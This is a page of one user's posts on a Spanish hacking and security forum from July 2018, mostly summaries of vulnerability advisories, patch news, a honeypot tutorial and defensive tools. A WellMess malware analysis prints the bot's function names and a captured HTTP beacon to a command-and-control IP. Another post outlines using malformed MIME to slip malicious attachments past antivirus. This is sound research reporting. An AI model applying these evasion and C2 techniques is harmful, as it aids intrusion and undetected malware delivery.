elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: ¿Eres nuevo? ¿Tienes dudas acerca del funcionamiento de la comunidad? Lee las Reglas Generales


  Mostrar Mensajes
Páginas: 1 ... 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 [38] 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 ... 122
371  Foros Generales / Noticias / Múltiples vulnerabilidades de ejecución de código remoto de Adobe Acrobat DC en: 10 Julio 2018, 20:59 pm
Descubierto por Aleksandar Nikolic de Cisco Talos
Visión de conjunto
Hoy, Talos está publicando detalles de nuevas vulnerabilidades dentro de Adobe Acrobat Reader DC. Adobe Acrobat Reader es el lector de PDF más popular y rico en características. Tiene una gran base de usuarios, generalmente es un lector de PDF predeterminado en los sistemas y se integra en los navegadores web como un complemento para la renderización de archivos PDF. Como tal, engañar a un usuario para visitar una página web maliciosa o enviar un archivo adjunto de correo electrónico especialmente diseñado puede ser suficiente para desencadenar estas vulnerabilidades.

TALOS-2018-0569 - Adobe Acrobat Reader DC Collab.drivers Remote Code Execution Vulnerability (CVE-2018-12812)

Un código javascript específico incrustado en un archivo PDF puede provocar confusión en el tipo de objeto al abrir un documento PDF en Adobe Acrobat Reader DC 2018.011.20038. Con una cuidadosa manipulación de la memoria, esto puede llevar a la ejecución de código arbitrario. Para activar esta vulnerabilidad, la víctima debería abrir el archivo malicioso o acceder a una página web maliciosa. La información detallada de vulnerabilidad se puede encontrar aquí.

https://www.talosintelligence.com/vulnerability_reports/TALOS-2018-0569

Más información: https://blog.talosintelligence.com/2018/07/vuln-spotlight-adobe-reader.html?utm_source=dlvr.it&utm_medium=twitter&utm_campaign=Feed%3A+feedburner%2FTalos+%28Talos%E2%84%A2+Blog%29

Saludos.
372  Foros Generales / Noticias / Microsoft lanza actualizaciones de parches para 53 vulnerabilidades en su softwa en: 10 Julio 2018, 20:55 pm
Microsoft lanza actualizaciones de parches para 53 vulnerabilidades en su software.

Es hora de adaptar sus sistemas y software para las últimas actualizaciones de parches de seguridad de julio de 2018.
Microsoft lanzó hoy actualizaciones de parches de seguridad para 53 vulnerabilidades, que afectan a Windows, Internet Explorer (IE), Edge, ChakraCore, .NET Framework, ASP.NET, PowerShell, Visual Studio y Microsoft Office y Office Services, y Adobe Flash Player.
De las 53 vulnerabilidades, 17 se clasifican como críticas, 34 importantes, una moderada y una de baja gravedad.
Este mes no hay una vulnerabilidad crítica parchada en el sistema operativo Microsoft Windows y, sorprendentemente, ninguno de los defectos reparados por el gigante tecnológico este mes aparece como públicamente conocido o bajo ataque activo.
Errores críticos parcheados en los productos de Microsoft
La mayoría de los problemas críticos son fallas de corrupción de memoria en IE, navegador Edge y motor de scripts Chakra, que si se explota con éxito, podría permitir a un atacante remoto no autenticado ejecutar código arbitrario en un sistema específico en el contexto del usuario actual.
"Si el usuario actual inicia sesión con derechos administrativos de usuario, un atacante que explotara con éxito la vulnerabilidad podría tomar el control de un sistema afectado. Un atacante podría entonces instalar programas, ver, cambiar o eliminar datos, o crear cuentas nuevas con usuario completo. derechos ", explica Microsoft.
Uno de estos defectos críticos (CVE-2018-8327), informado por los investigadores de Casaba Security, también afecta a los Servicios Editor de PowerShell que podrían permitir a un atacante remoto ejecutar código malicioso en un sistema vulnerable.
A continuación, puede encontrar una breve lista de todas las vulnerabilidades críticas que Microsoft ha parcheado este mes en sus diversos productos:

Scripting Engine Memory Corruption Vulnerability (CVE-2018-8242)
Edge Memory Corruption Vulnerability (CVE-2018-8262)
Edge Memory Corruption Vulnerability (CVE-2018-8274)
Scripting Engine Memory Corruption Vulnerability (CVE-2018-8275)
Scripting Engine Memory Corruption Vulnerability (CVE-2018-8279)
Chakra Scripting Engine Memory Corruption Vulnerability (CVE-2018-8280)
Scripting Engine Memory Corruption Vulnerability (CVE-2018-8283)
Chakra Scripting Engine Memory Corruption Vulnerability (CVE-2018-8286)
Scripting Engine Memory Corruption Vulnerability (CVE-2018-8288)
Chakra Scripting Engine Memory Corruption Vulnerability (CVE-2018-8290)
Scripting Engine Memory Corruption Vulnerability (CVE-2018-8291)
Chakra Scripting Engine Memory Corruption Vulnerability (CVE-2018-8294)
Scripting Engine Memory Corruption Vulnerability (CVE-2018-8296)
Chakra Scripting Engine Memory Corruption Vulnerability (CVE-2018-8298)
Microsoft Edge Memory Corruption Vulnerability (CVE-2018-8301)
Microsoft Edge Information Disclosure Vulnerability (CVE-2018-8324)
PowerShell Editor Services Remote Code Execution Vulnerability (CVE-2018-8327)

Más información: https://thehackernews.com/2018/07/microsoft-security-patch-update.html?utm_source=dlvr.it&utm_medium=twitter

Saludos.
373  Foros Generales / Noticias / Bloqueo de Facebook Messenger para Android con un ataque MITM en: 10 Julio 2018, 20:51 pm
Resumen
Facebook Messenger para Android se puede bloquear a través de la verificación de estado de la aplicación. Esto puede ser explotado por un atacante de MITM interceptando esa llamada y devolviendo una gran cantidad de datos. Esto sucede porque esta comprobación de estado no se realiza a través de SSL y la aplicación no contiene lógica para verificar si los datos devueltos son muy grandes.

El vendedor no tiene planes inmediatos para solucionar este problema.

Detalles de vulnerabilidad
Facebook Messenger para Android es una aplicación de mensajería proporcionada por Facebook. Al monitorear el tráfico de red de un dispositivo de prueba que ejecuta Android, observamos que la aplicación realiza llamadas de red para verificar el estado del servidor. Esta llamada se realizó a través de HTTP sin el uso de SSL / TLS. URL de ejemplo:

http://portal.fb.com/mobile/status.php
Tuvimos éxito al bloquear la aplicación al inyectar un paquete grande porque la aplicación no maneja datos grandes que regresan correctamente y no usa SSL para esta llamada.

También es importante tener en cuenta que esto le permitiría a alguien bloquear el uso de Messenger pero sin que los usuarios se den cuenta de que están siendo bloqueados, ya que atribuirán la falla de la aplicación a un error en lugar de a un bloqueo.

Más información:
http://seclists.org/fulldisclosure/2018/Jul/37?utm_source=feedburner&utm_medium=twitter&utm_campaign=Feed%3A+seclists%2FFullDisclosure+%28Full+Disclosure%29
https://wwws.nightwatchcybersecurity.com/2018/07/09/advisory-crashing-facebook-messenger-for-android-with-an-mitm-attack/

Saludos.
374  Seguridad Informática / Análisis y Diseño de Malware / ¡Ejecutar la trampa! Cómo configurar tu propio Honeypot para recolectar muestras en: 9 Julio 2018, 22:52 pm
¡Ejecutar la trampa! Cómo configurar tu propio Honeypot para recolectar muestras de malware

Introducción
Este documento es cómo configurar su propio Honeypot (dionaea). Diría que a la mayoría de nosotros nos gustan los binarios de ingeniería inversa. Muchos de nosotros tenemos una fascinación con el malware. ¿Por qué no combinarlos y RE con algunos Malware que están siendo usados ​​activamente para la explotación?

Mi tutorial es cómo configurar un honeypot en Amazon Web Services (AWS). Si no está familiarizado con AWS, tldr; ellos tienen servidores, puedes usarlos. ProTip: si tiene 1 microinstancia con un disco duro adjunto de menos de 50 GB, puede tener un servidor gratuito. Tendrá que proporcionar la información de su tarjeta de crédito a AWS, pero se le permite un servidor gratuito para siempre, siempre y cuando permanezca en el "nivel libre". Ahora puede aumentar n-número de micro-instancias, pero solo obtiene lo que equivale a 1 mes de cantidad de horas, cada mes. Entonces, si activas 2 instancias micro, a mitad de camino del dinero, comenzarás a facturar hasta fin de mes. Así que ten cuidado.

Nivel de autor: Skiddo
Habilidades requeridas
Comandos generales de Linux
Comprensión general de las redes
Requisitos
Servidor (AWS funciona bien. Gratis con CC proporcionado)
Descargo de responsabilidad (opcional)
A algunos proveedores de hosting no les gusta el malware.
Así que, quizás, no recopilen en sus servidores si no son geniales como usted.

(Separe este encabezado del papel usando una regla horizontal)

Paper:
Configuración de AWS
Comenzaré ahora a configurar su instancia de AWS.
[Si no está utilizando AWS, salte a la próxima sección.]

Continúe haciendo clic en EC2 y Crear una nueva instancia. (EC2 == Servidores AWS). Después de eso, desea seleccionar Ubuntu Server 14.04 LTS



Luego, selecciona el tipo de micro-instancia:



Genial, ahora para configurar detalles de instancia, seleccione "Asignar automáticamente IP pública" y configúrelo como "Habilitar". (No te preocupes por mi rol de IAM)



Más información: https://0x00sec.org/t/run-the-trap-how-to-setup-your-own-honeypot-to-collect-malware-samples/7445

Saludos.
375  Foros Generales / Dudas Generales / Re: Soy nuevo, quisiera alguien que sea mi mentor! en: 9 Julio 2018, 22:39 pm
Cita de: dectroy en  9 Julio 2018, 22:18 pm
cuento con dos pc una de escritorio y otro notebook. la de escritorio es un i7. con 16 de ram un tera de disco rigido y placa de video asus gtx 750 y la notebook es una i5 con 8 de ram

Tienes buenas máquinas para poder virtualizar S.O
Podrías comenzar por virtualizar algún sistema de linux, por ejemplo. Te conviene aprender algo de linux, no te iría mal y aprenderías bastante más que solo con Windows.
Ahora tienes dos opiniones, te toca aprender, como te ha dicho MCKSys Argentina, en los temas fijos con chincheta tienes bastante info al respecto de cada tema.
La seguridad y programación abarcan muchos temas, ve aprendiendo lo que más te guste e indaga, para ser un buen hacker o informático como quieras llamarlo tienes que aprender varios lenguajes de programación, seguridad por supuesto, eso ya a tu gusto.

Bienvenido al foro !!!  :P
376  Seguridad Informática / Análisis y Diseño de Malware / Un dropper interesante.... en: 9 Julio 2018, 22:25 pm

https://app.any.run/tasks/ad02108c-1f77-423f-9baf-96445260f589

Saludos.
377  Seguridad Informática / Análisis y Diseño de Malware / Malware "WellMess" dirigido a Linux y Windows en: 9 Julio 2018, 21:51 pm

Algunos programas maliciosos están diseñados para ejecutarse en múltiples plataformas y, por lo general, están escritos en Java. Por ejemplo, Adwind malware (introducido en un artículo anterior) está escrito en Java y se ejecuta en Windows y otros sistemas operativos. Golang es otro lenguaje de programación, y se usa para el controlador Mirai, que infecta los sistemas Linux.

Este artículo presenta el comportamiento del malware WellMess basado en nuestra observación. Es un tipo de malware programado en Golang y compilado de forma cruzada para que sea compatible tanto con Linux como con Windows. Para obtener más detalles sobre la función de malware, consulte también el informe de LAC [1].

Comportamiento de WellMess
Generalmente, los archivos ejecutables de Golang incluyen muchas bibliotecas requeridas en sí mismas. Esto generalmente aumenta el tamaño del archivo, lo que hace que WellMess sea más grande que 3 MB. Otra característica es que los nombres de funciones para los archivos ejecutables se pueden encontrar en el archivo mismo. (Incluso para los archivos eliminados, los nombres de las funciones se pueden recuperar utilizando herramientas como GoUtils2.0 [2]). A continuación se muestran los nombres de funciones utilizados en WellMess:

Código:
_/home/ubuntu/GoProject/src/bot/botlib.EncryptText
_/home/ubuntu/GoProject/src/bot/botlib.encrypt
_/home/ubuntu/GoProject/src/bot/botlib.Command
_/home/ubuntu/GoProject/src/bot/botlib.reply
_/home/ubuntu/GoProject/src/bot/botlib.Service
_/home/ubuntu/GoProject/src/bot/botlib.saveFile
_/home/ubuntu/GoProject/src/bot/botlib.UDFile
_/home/ubuntu/GoProject/src/bot/botlib.Download
_/home/ubuntu/GoProject/src/bot/botlib.Send
_/home/ubuntu/GoProject/src/bot/botlib.Work
_/home/ubuntu/GoProject/src/bot/botlib.chunksM
_/home/ubuntu/GoProject/src/bot/botlib.Join
_/home/ubuntu/GoProject/src/bot/botlib.wellMess
_/home/ubuntu/GoProject/src/bot/botlib.RandStringBytes
_/home/ubuntu/GoProject/src/bot/botlib.GetRandomBytes
_/home/ubuntu/GoProject/src/bot/botlib.Key
_/home/ubuntu/GoProject/src/bot/botlib.GenerateSymmKey
_/home/ubuntu/GoProject/src/bot/botlib.CalculateMD5Hash
_/home/ubuntu/GoProject/src/bot/botlib.Parse
_/home/ubuntu/GoProject/src/bot/botlib.Pack
_/home/ubuntu/GoProject/src/bot/botlib.Unpack
_/home/ubuntu/GoProject/src/bot/botlib.UnpackB
_/home/ubuntu/GoProject/src/bot/botlib.FromNormalToBase64
_/home/ubuntu/GoProject/src/bot/botlib.RandInt
_/home/ubuntu/GoProject/src/bot/botlib.Base64ToNormal
_/home/ubuntu/GoProject/src/bot/botlib.KeySizeError.Error
_/home/ubuntu/GoProject/src/bot/botlib.New
_/home/ubuntu/GoProject/src/bot/botlib.(*rc6cipher).BlockSize
_/home/ubuntu/GoProject/src/bot/botlib.convertFromString
_/home/ubuntu/GoProject/src/bot/botlib.(*rc6cipher).Encrypt
_/home/ubuntu/GoProject/src/bot/botlib.(*rc6cipher).Decrypt
_/home/ubuntu/GoProject/src/bot/botlib.Split
_/home/ubuntu/GoProject/src/bot/botlib.Cipher
_/home/ubuntu/GoProject/src/bot/botlib.Decipher
_/home/ubuntu/GoProject/src/bot/botlib.Pad
_/home/ubuntu/GoProject/src/bot/botlib.AES_Encrypt
_/home/ubuntu/GoProject/src/bot/botlib.AES_Decrypt
_/home/ubuntu/GoProject/src/bot/botlib.generateRandomString
_/home/ubuntu/GoProject/src/bot/botlib.deleteFile
_/home/ubuntu/GoProject/src/bot/botlib.Post
_/home/ubuntu/GoProject/src/bot/botlib.SendMessage
_/home/ubuntu/GoProject/src/bot/botlib.ReceiveMessage
_/home/ubuntu/GoProject/src/bot/botlib.Send.func1
_/home/ubuntu/GoProject/src/bot/botlib.init
_/home/ubuntu/GoProject/src/bot/botlib.(*KeySizeError).Error

Como se mencionó anteriormente, WellMess tiene una versión que se ejecuta en Windows (PE) y otra en Linux (ELF). Aunque hay algunas diferencias menores, ambas tienen la misma funcionalidad.

El malware se comunica con un servidor C & C utilizando solicitudes HTTP y realiza funciones basadas en los comandos recibidos. A continuación se muestra un ejemplo de la comunicación: (el valor de User-Agent varía por muestra).

Código:
POST / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20130401 Firefox/31.0
Content-Type: application/x-www-form-urlencoded
Accept: text/html, */*
Accept-Language: en-US,en;q=0.8
Cookie: c22UekXD=J41lrM+S01+KX29R+As21Sur+%3asRnW+3Eo+nIHjv+o6A7qGw+XQr%3aq+PJ9jaI+KQ7G.+FT2wr+wzQ3vd+3IJXC+lays+k27xd.+di%3abd+mHMAi+mYNZv+Mrp+S%2cV21.+ESollsY+6suRD+%2cx8O1m+%3azc+GYdrw.+FbWQWr+5pO8;1rf4EnE9=+WMyn8+8ogDA+WxR5R.+sFMwDnV+DFninOi+XaP+p4iY+82U.+hZb+QB6+kMBvT9R
Host: 45.123.190.168
Content-Length: 426
Expect: 100-continue
Accept-Encoding: deflate
Connection: Keep-Alive

pgY4C8 8JHqk RjrCa R9MS 3vc4Uk KKaRxH R8vg Tfj B3P,C 0RG9lFw DqF405. i3RU1 0lW 2BqdSn K3L Y7hEc. tzto yKU8 p1,E L2kKg pQcE1. b8V6S0Y 6akx, ggMcrXk 0csao Uwxn. fYVtWD rwt:BJ 5IBn rCMxZoo OsC. :ZXg pKT Re0 cJST1 L0GsC. 9dJZON9 qs29pPB pCTR:8 0hO0FK sK13UUw. jMA hDICL hGK1 qjRj1AY YMjAIeI. g7GEZPh gW:C eNX6 ptq kevfIyP. u,96r7c D:6ZiR fCC IIi cBvq,p. Vt96aEu JFLeu 0XtFJm ee4S 7M2. Uc68sF MArC5v 96ngG 9UvQGt 5:ut. qiE0xQ

Más información: https://blog.jpcert.or.jp/2018/07/malware-wellmes-9b78.html

Saludos.
378  Foros Generales / Noticias / Cinco sencillos pasos para eludir el antivirus utilizando MIME manipulado en: 9 Julio 2018, 21:46 pm
Introducción
Tradicionalmente, los correos electrónicos son solo ASCII y están limitados a 1000 caracteres por línea. El estándar MIME define una forma de tener un correo estructurado (varias partes, incluidos los archivos adjuntos) y para transportar datos que no sean ASCII. Desafortunadamente, el estándar es innecesariamente complejo y flexible, hace que las definiciones contradictorias sean posibles y no define el manejo real de errores.

El resultado de esto es que las diferentes implementaciones interpretan casos extremos de MIME válido o MIME inválido a propósito de diferentes maneras. Esto incluye la interpretación en sistemas de análisis como filtros de correo, IDS / IPS, gateways de correo o antivirus, que a menudo interpretan los correos preparados específicamente de forma diferente al sistema del usuario final.

Esta publicación muestra lo fácil que es modificar un correo con un archivo adjunto malicioso en unos simples pasos, para que al final ningún antivirus de Virustotal pueda extraer correctamente el archivo adjunto del correo y detectar el malware. Después de toda esta modificación, aún es posible abrir el correo en Thunderbird y acceder a la carga maliciosa sin problemas.

Nada de esto es en realidad realmente nuevo. Publiqué problemas similares antes en 11/2014 y varias publicaciones en 07/2015 y también mostré cómo se puede utilizar para eludir el control adecuado de las firmas DKIM. Y también hay investigaciones mucho más antiguas como esta desde 2008.

Sin embargo, los sistemas de análisis todavía están rotos y los proveedores o bien no están al tanto de estos problemas o no hablan de estos problemas. Por lo tanto, podría ser útil volver a mostrar cuán trivial puede hacerse ese desvío de análisis, con la esperanza de que al menos algunos proveedores despierten y arreglen sus productos. A continuación, se muestra cómo ocultar un archivo adjunto malicioso del análisis adecuado en unos pocos pasos simples y fáciles de seguir.

Paso 1: MIME normal
Comenzamos con un correo que contiene el inocente virus de prueba EICAR dentro de un archivo ZIP. El correo consta de dos partes MIME, la primera es un texto y la segunda el archivo adjunto, codificado con Base64 para traducir el archivo adjunto binario en ASCII para el transporte. A partir de hoy (2018/07/05) 36 (de 59) productos en Virustotal son capaces de detectar la carga maliciosa. El resto probablemente no pueda o no esté configurado para tratar con archivos de correo electrónico o malware en archivos ZIP.

Más información: https://noxxi.de/research/mime-5-easy-steps-to-bypass-av.html

Saludos.
379  Seguridad Informática / Seguridad / Logon Tracer en: 9 Julio 2018, 21:36 pm
LogonTracer es una herramienta para investigar inicios de sesión maliciosos al visualizar y analizar los registros de eventos de Windows Active Directory. El análisis del registro de eventos es un elemento clave en DFIR. En la fase de movimiento lateral de los incidentes de APT, el análisis de los registros de eventos de Windows Active Directory es crucial, ya que es una de las pocas formas de identificar los hosts comprometidos. Al mismo tiempo, examinar los registros suele ser una tarea dolorosa porque Windows Event Viewer no es una mejor herramienta. Los analistas a menudo terminan exportando registros completos en formato de texto, y luego los alimentan a otras herramientas como SIEM. Sin embargo, SIEM no es una solución perfecta para manejar la creciente cantidad de registros.

Nos gustaría presentar una herramienta de análisis de registro de eventos más especializada para los respondedores de incidentes. Visualiza registros de eventos utilizando análisis de red y aprendizaje automático para mostrar la correlación de cuentas y hosts. Demostrado con nuestra experiencia de respuesta sobre el terreno, lo más importante es que es una herramienta de código abierto.

Link: https://github.com/JPCERTCC/LogonTracer

Saludos.
380  Foros Generales / Noticias / Apple lanza iOS 11.4.1 y bloquea las herramientas de descifrado de códigos de ac en: 9 Julio 2018, 20:36 pm
Apple lanza iOS 11.4.1 y bloquea las herramientas de descifrado de códigos de acceso utilizadas por la policía

Apple lanzó hoy iOS 11.4.1, y aunque la mayoría de nosotros ya estamos mirando hacia adelante para ver todo lo nuevo que viene en iOS 12, esta pequeña actualización contiene una nueva e importante característica de seguridad: Modo Restringido USB. Apple ha agregado protecciones contra los dispositivos USB que usan las fuerzas del orden público y las compañías privadas que se conectan con Lightning para descifrar el código de acceso de un iPhone y evadir las protecciones de cifrado habituales de Apple.

Si va a Configuración y marca debajo de ID de rostro (o ID táctil) y Código de acceso, verá una nueva alternancia para Accesorios USB. Por defecto, el interruptor está apagado. Esto significa que una vez que su iPhone o iPad se ha bloqueado durante más de una hora seguidas, iOS ya no permitirá que los accesorios USB se conecten al dispositivo, lo que desactivará las herramientas de craqueo como GrayKey. Si tiene accesorios que desea seguir trabajando después de que su iPhone haya estado bloqueado por un tiempo, puede alternar la opción para eliminar el límite de horas.



Más información: https://www.theverge.com/2018/7/9/17549538/apple-ios-11-4-1-blocks-police-passcode-cracking-tools?utm_campaign=theverge&utm_content=chorus&utm_medium=social&utm_source=twitter

Saludos.
Páginas: 1 ... 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 [38] 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 ... 122
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines